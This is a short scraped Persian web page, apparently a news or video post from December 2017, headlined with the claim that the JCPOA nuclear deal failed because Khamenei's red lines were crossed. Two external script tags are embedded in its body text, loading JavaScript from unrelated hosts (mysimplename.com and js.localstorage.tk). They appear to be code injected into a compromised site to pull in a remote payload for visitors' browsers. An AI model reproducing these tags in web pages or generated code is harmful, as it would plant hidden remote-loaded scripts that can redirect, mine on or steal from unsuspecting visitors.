دلیل بی نتیجه بودن برجام،عبور از خط قرمزهای امام خامنه ای بود


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>دلیل بی نتیجه بودن برجام،عبور از خط قرمزهای امام خامنه ای بود
همه این سفارشات شود ولی باز هم رعایت نشد و ضربه را خوردیم.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
6

- 
0
ارسال در 1396/9/16 ساعت 09:37 2017-12-7 08:37:44

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر